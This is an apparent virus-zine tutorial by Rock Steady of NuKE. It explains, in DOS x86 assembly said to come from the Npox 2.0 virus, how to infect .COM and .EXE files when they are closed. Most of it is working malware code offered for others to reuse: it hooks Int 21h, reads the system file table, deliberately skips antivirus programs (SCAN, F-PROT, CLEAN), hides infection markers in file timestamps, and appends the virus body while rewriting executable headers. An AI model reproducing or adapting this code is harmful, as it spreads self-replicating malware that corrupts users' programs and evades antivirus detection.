Infection on Closing
By: Rock Steady / NuKE
This routine goes out for a few people that had trouble hacking this routine themselves... I kinda like it, its my very OWN, no Dark Avenger hack, it is VERY straight forward, and kinda simple...I was not going to put this here, but since I `Promised' people and left them hanging with `Wait for IJ#5, I guess I owed you it... huh?'
Again this code comes right out of Npox 2.0, its need, simple fast, cool, and it works, Npox is your example, I heard MANY MANY complaints with other `Virus writing guides' Meaning they explained the code but sometimes the arthur himself never check if the code was good, as he may have modified it, and not test it... or whatever reason... Anyhow
Okay once you intercepted the Int21h/ah=3Dh function you make it jump here...
closing_file: cmp bx,0h ;Handle=0?
je closing_bye ;if equal leave
cmp bx,4h ;Handle < 4
ja close_cont ;if YES ,then JUMP!
closing_bye: jmp dword ptr cs:[int21] ;Leave, no interest to us
The whole point of the above code is that DOS contains 5 predefined Handlers, 0 -< 4, Basically, those handles are the NULL, CON, AUX COMx, LPTx handles... So we surely do not need to continue once we encounter that...
close_cont: push ax
push bx
push cx
push dx
push di
push ds
push es
push bp
Our biggest problem is how do we know if this file is a .COM or .EXE or simply just another dumb data file? We need this info before we can try to infect it... We do this by getting DOS's "Lists of List" this will give us all INFO need on the File Handle Number we have in BX! and we do that like so...
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)
This will give us the JFT for the CURRENT File handle in BX, which is given thru ES:DI Then we use this information to get the Address of the System File Table!
mov ax,1216h ;Get System File Table (List)
mov bl,es:[di] ;system file table entry number
int 2fh
pop bx ;restore the Handle
add di,0011h
mov byte ptr es:[di-0fh],02h
add di,0017h ;Jump to the ASCIIZ string
cmp word ptr es:[di],'OC' ;Is it a .COM file?
jne closing_next_try ;Next cmp...
cmp byte ptr es:[di+2h],'M'
jne pre_exit ;Nope exit
jmp closing_cunt3 ;.COM file continue
closing_next_try:
cmp word ptr es:[di],'XE' ;Is it a .EXE file?
jne pre_exit ;No, exit
cmp byte ptr es:[di+2h],'E'
jne pre_exit ;No, exit
If it is an .EXE file, check if it is F-PROT or SCAN, see F-PROT when started up, Opens itself, closes itself, etc... So that a dumb virus will infect it, and then the CRC value changes and F-PROT screams... haha... Fuck-Prot! is the name...
closing_cunt: cmp word ptr es:[di-8],'CS'
jnz closing_cunt1 ;SCAN
cmp word ptr es:[di-6],'NA'
jz pre_exit
closing_cunt1: cmp word ptr es:[di-8],'-F'
jnz closing_cunt2 ;F-PROT
cmp word ptr es:[di-6],'RP'
jz pre_exit
closing_cunt2: cmp word ptr es:[di-8],'LC'
jnz closing_cunt3
cmp word ptr es:[di-6],'AE' ;CLEAN
jnz closing_cunt3
pre_exit: jmp closing_nogood
The REST is pretty much the EXACT same on `how' you'd infect a normal file, I'll leave it for you to go thru it... The hardest part is OVER! Only trick part is, the ending... Remember to Close the file and then do an IRET, you don't leave control to dos, as you only needed to close it, so do it... OR DON'T close it and return to DOS, as dos will close it, just DON'T CLOSE IT TWICE!!!!
closing_cunt3: mov ax,5700h ;Get file Time
call calldos21
mov al,cl
or cl,1fh
dec cx ;60 Seconds
xor al,cl
jz closing_nogood ;Already infected
push cs
pop ds
mov word ptr ds:[old_time],cx ;Save time
mov word ptr ds:[old_date],dx
mov ax,4200h ;jmp beginning of
xor cx,cx ;file...
xor dx,dx
call calldos21
mov ah,3fh ;Get first 1b byte
mov cx,1Bh
mov dx,offset buffer
call calldos21
jc closing_no_good ;error?
mov ax,4202h ;Jmp to the EOF
xor cx,cx
xor dx,dx
call calldos21
jc closing_no_good
cmp word ptr ds:[buffer],5A4Dh ;.EXE file?
je closing_exe ;Yupe then jmp
mov cx,ax
sub cx,3h
mov word ptr ds:[jump_address+1],cx ;Figure out the
call infect_me ;jmp for .com
jc closing_no_good
mov ah,40h ;Write it to file
mov dx,offset jump_address
mov cx,3h
call calldos21
closing_no_good:
mov cx,word ptr ds:[old_time] ;Save file time
mov dx,word ptr ds:[old_date] ;& date
mov ax,5701h
call calldos21
closing_nogood: pop bp
pop es
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[int21]
AS you see the above, we DIDN'T close the file, so we leave dos to do it. The bottom is for infecting .exes...
closing_exe: mov cx,word ptr cs:[buffer+20] ;Save the original
mov word ptr cs:[exe_ip],cx ;CS:IP & SS:SP
mov cx,word ptr cs:[buffer+22]
mov word ptr cs:[exe_cs],cx
mov cx,word ptr cs:[buffer+16]
mov word ptr cs:[exe_sp],cx
mov cx,word ptr cs:[buffer+14]
mov word ptr cs:[exe_ss],cx
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
mov word ptr cs:[vir_cs],dx
push ax
push dx
call infect_me
pop dx
pop ax
mov word ptr cs:[buffer+22],dx
mov word ptr cs:[buffer+20],ax
pop dx
pop ax
jc closing_no_good
add ax,virus_size
adc dx,0
push ax
push dx
call multiply
sub dx,word ptr cs:[buffer+8]
add ax,40h
mov word ptr cs:[buffer+14],dx
mov word ptr cs:[buffer+16],ax
pop dx
pop ax
push bx
push cx
mov cl,7
shl dx,cl
mov bx,ax
mov cl,9
shr bx,cl
add dx,bx
and ax,1FFh
jz close_split
inc dx
close_split: pop cx
pop bx
mov word ptr cs:[buffer+2],ax
mov word ptr cs:[buffer+4],dx
mov ah,40h
mov dx,offset ds:[buffer]
mov cx,20h
call calldos21
closing_over: jmp closing_no_good
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
; Infection Routine...
;-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
infect_me proc
mov ah,40h
mov dx,offset init_virus
mov cx,virus_size
call calldos21
jc exit_error ;Error Split
mov ax,4200h
xor cx,cx ;Pointer back to
xor dx,dx ;Top of file!
call calldos21
jc exit_error ;Split Dude...
clc ;Clear carry flag
ret
exit_error:
stc ;Set carry flag
ret
infect_me endp
Desperation/MOB